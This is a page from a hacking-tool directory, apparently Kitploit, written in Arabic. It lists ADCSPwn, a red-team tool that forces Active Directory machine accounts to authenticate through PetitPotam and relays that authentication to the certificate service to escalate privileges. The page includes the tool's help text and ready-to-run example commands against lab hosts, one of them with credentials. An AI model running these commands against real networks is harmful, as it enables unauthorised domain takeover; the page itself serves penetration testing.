Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ADCSPwn — أداة لتصعيد الامتيازات في شبكة الدليل النشط عن طريق إجبار حسابات الآلات على المصادقة وترحيلها إلى خدمة الشهادات. | Kitploit
أدوات/GitHubGitHub/bats3c/adcspwn
تصعيد الامتيازاتالاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
GitHubbats3c/adcspwn

ADCSPwn

أداة لتصعيد الامتيازات في شبكة الدليل النشط عن طريق إجبار حسابات الآلات على المصادقة وترحيلها إلى خدمة الشهادات.

عرض المستودع
878127منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ADCSPwn

أداة لتصعيد الامتيازات في شبكة الدليل النشط عن طريق إجبار المصادقة من حسابات الأجهزة (Petitpotam) وإعادة التوجيه إلى خدمة الشهادات.

الاستخدام

قم بتشغيل ADCSPwn على شبكتك المستهدفة.

root@kitploit:~
Author: @_batsec_ - MDSec ActiveBreach
Contributor: @Flangvik -  TrustedSec
Contributor: @424f424f -  Black Hills Information Security

adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]

Required arguments:
adcs            -       This is the address of the AD CS server which authentication will be relayed to.

Optional arguments:
secure          -       Use HTTPS with the certificate service.
port            -       The port ADCSPwn will listen on.
remote          -       Remote machine to trigger authentication from.
username        -       Username for non-domain context.
password        -       Password for non-domain context.
dc              -       Domain controller to query for Certificate Templates (LDAP).
unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
output          -       Output path to store base64 generated crt.

Example usage:
adcspwn.exe --adcs cs.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --secure
adcspwn.exe --adcs cs.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local
adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --dc dc.pwnlab.local --unc \\WIN-WORK01.pwnlab.local\made\up\share

الشكر

  • @harmj0y و @tifkin_ لـ الورقة البيضاء التي تشرح هذه المشكلة.
  • @topotam77 لإظهار كيفية إساءة استخدام EfsRpcOpenFileRaw.
تنزيل الأداة